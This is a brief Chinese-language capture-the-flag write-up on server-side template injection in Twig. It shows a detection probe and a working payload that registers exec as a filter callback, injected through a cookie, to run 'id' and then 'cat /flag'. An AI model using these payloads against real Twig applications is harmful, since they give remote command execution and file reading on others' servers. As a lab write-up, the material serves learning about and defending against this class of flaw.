这是道服务器端模板注入,过段时间总结一下各种payload到一篇文章里。
测试ssti漏洞的payload为
{{7*'7'}}
如果返回的是49就是twg注入,7777777是jinja2(这个我还没实验,摘自他人文章)
返回的是49,说明是twg模板,下面是固定的测试twg注入的payload,
一篇文章带你理解漏洞之 SSTI 漏洞
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
回调exec实现命令执行,下面是测试:
利用提示的cookie,改cookie实现注入。
注入成功,将命令改为cat /flag
即可查看flag文件,payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}